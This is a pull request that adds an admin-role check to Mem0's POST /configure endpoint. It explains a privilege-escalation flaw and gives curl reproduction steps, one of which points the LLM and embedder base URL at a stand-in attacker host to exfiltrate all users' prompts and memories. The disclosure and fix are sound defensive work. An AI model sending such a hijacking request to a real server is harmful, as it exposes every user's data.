### PR TITLE
Enforce admin role for POST /configure (Fixes #5127)

### DIFF
--- a/server/main.py
+++ b/server/main.py
@@ -318,6 +318,9 @@ def list_bundled_providers(_auth=Depends(verify_auth)):
 @app.post("/configure", summary="Configure Mem0")
 def set_config(config: Dict[str, Any], _auth=Depends(verify_auth)):
     """Set memory configuration."""
+    # Admin-only check (CVE-2026-XXXX)
+    if not _auth or getattr(_auth, "role", None) != "admin":
+        raise HTTPException(status_code=403, detail="Admin access required")
     _validate_bundled_providers(config)
     update_config(config)
     return {"message": "Configuration set successfully"}


### PR DESCRIPTION
## Summary

POST `/configure` modifies the **global** LLM/embedder configuration (endpoint URL, API key, model) for the **entire Mem0 instance**. 

This endpoint only validates that the caller has a valid authentication token (`verify_auth()`), but **never checks the caller's role**.

Any holder of a distributed API key can redirect **all** LLM and embedder traffic to an attacker-controlled server, exfiltrating every user's prompts, memories, and embeddings.

## Root Cause

The `User` model defines a `role` field (`"admin"` for the first registered user). However, this field is **never checked** anywhere in the authorization flow:

```python
# server/auth.py:145-171
async def verify_auth(...) -> User | None:
    """Authenticate via JWT, X-API-Key, or legacy ADMIN_API_KEY. Returns User or None."""
    if credentials is not None:
        return _resolve_user_from_jwt(credentials.credentials, db)  # ← no role check
    if x_api_key is not None:
        return _resolve_user_from_api_key(x_api_key, db)  # ← no role check
    ...
```

```python
# server/main.py:313-318
@app.post("/configure", summary="Configure Mem0")
def set_config(config: Dict[str, Any], _auth=Depends(verify_auth)):  # ← only checks token
    _validate_bundled_providers(config)
    update_config(config)  # ← modifies GLOBAL config + persists to DB
    return {"message": "Configuration set successfully"}
```

The `role` field is stored in JWT claims (`create_access_token(str(user.id), user.role)`) but **never validated** on any endpoint.

## Fix

Add admin role check to `set_config()`:

```python
@app.post("/configure", summary="Configure Mem0")
def set_config(config: Dict[str, Any], _auth=Depends(verify_auth)):
    """Set memory configuration."""
    # Admin-only check
    if not _auth or getattr(_auth, 'role', None) != "admin":
        raise HTTPException(status_code=403, detail="Admin access required")
    _validate_bundled_providers(config)
    update_config(config)
    return {"message": "Configuration set successfully"}
```

## Reproduction Steps

### Prerequisites
Running Mem0 server with `AUTH_DISABLED=false`.

### Steps

1. **Register admin** (first user) and create an API key:
   ```bash
   # Register admin
   curl -X POST http://localhost:8888/auth/register \
     -H "Content-Type: application/json" \
     -d '{"name":"Admin","email":"admin@example.com","password":"SecurePass123!"}'
   
   # Extract access_token from response, then create API key
   curl -X POST http://localhost:8888/api-keys \
     -H "Authorization: Bearer <admin_jwt>" \
     -H "Content-Type: application/json" \
     -d '{"label":"service-key"}'
   ```

2. **Using ONLY the API key** (simulating a service/team member), hijack the global LLM config:
   ```bash
   curl -X POST http://localhost:8888/configure \
     -H "X-API-Key: m0sk_<the_key>" \
     -H "Content-Type: application/json" \
     -d '{
       "llm": {"provider":"openai","config":{"api_key":"sk-attacker","openai_base_url":"https://attacker.evil.com/v1"}},
       "embedder": {"provider":"openai","config":{"api_key":"sk-attacker","openai_base_url":"https://attacker.evil.com/v1"}}
     }'
   # Response: 200 {"message": "Configuration set successfully"}
   ```

3. **Verify**: ALL subsequent memory operations now go to attacker endpoint:
   ```bash
   curl -X POST http://localhost:8888/memories \
     -H "X-API-Key: m0sk_<the_key>" \
     -H "Content-Type: application/json" \
     -d '{"messages":[{"role":"user","content":"my password is hunter2"}],"user_id":"victim"}'
   # Response: 502 (upstream error — LLM tried to reach attacker.evil.com)
   ```

## Expected vs. Actual Behavior

- **Expected**: Only users with `role="admin"` can modify global configuration. Non-admin API key holders receive `403 Forbidden`.
- **Actual**: Any valid API key holder can hijack global LLM config, causing all subsequent memory operations to fail or exfiltrate data.

## Impact

- **Confidentiality**: All user prompts, memories, and embeddings sent to attacker-controlled server
- **Integrity**: Attacker can modify responses (MITM)
- **Availability**: Service becomes unavailable (502 errors for all users)

## Environment

- **Repository**: https://github.com/mem0ai/mem0
- **Component**: `server/` (self-hosted REST API)
- **Branch**: `main` (latest as of 2026-05-12)
- **Affected files**:
  - `server/main.py:313-318` — vulnerable endpoint
  - `server/auth.py:145-171` — `verify_auth()` never checks role
  - `server/server_state.py:86-95` — `update_config()` modifies global singleton + persists to DB
  - `server/models.py` — `User.role` field exists but is unused

## Fix Details

This PR adds admin role verification to the `set_config()` function (POST `/configure` endpoint).

**Changes**:
- `server/main.py`: Add admin role check before applying config changes
- Return `403 Forbidden` if caller is not admin

**Testing**:
- [ ] Non-admin API key holder receives `403 Forbidden`
- [ ] Admin can still configure LLM/embedder
- [ ] Existing tests still pass

Fixes #5127.
